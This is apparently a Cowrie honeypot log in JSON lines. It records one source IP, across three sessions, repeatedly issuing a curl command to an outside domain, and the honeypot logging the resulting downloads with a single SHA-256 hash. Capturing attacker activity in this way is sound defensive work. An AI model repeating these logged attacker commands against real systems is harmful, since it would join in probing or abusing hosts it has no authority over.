{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.298650Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.299686Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.300301Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.303314Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.303940Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.306048Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.306861Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.309881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.312306Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.340663Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.342525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.344060Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.344482Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.370981Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.371909Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.373481Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.374312Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.377816Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.382498Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.409305Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.410324Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.410776Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.413930Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.414504Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.417540Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.418682Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.419304Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.449480Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.450170Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.453500Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.456378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.457815Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.458352Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.461512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.463911Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.465061Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.492799Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.494481Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.496833Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.498926Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.499564Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.501721Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.502233Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.505938Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.507034Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.537344Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.539922Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.541802Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.542688Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.544767Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.545733Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.549152Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.552667Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.555567Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.556169Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.583506Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.584239Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.586592Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.588037Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.590850Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.594137Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.596360Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.597074Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.624156Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.625261Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.625795Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.629335Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.629918Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.633618Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.634056Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.666218Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.668347Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.670737Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.672879Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.673908Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.674638Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.678869Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.680698Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:41.681328Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:41.711601Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
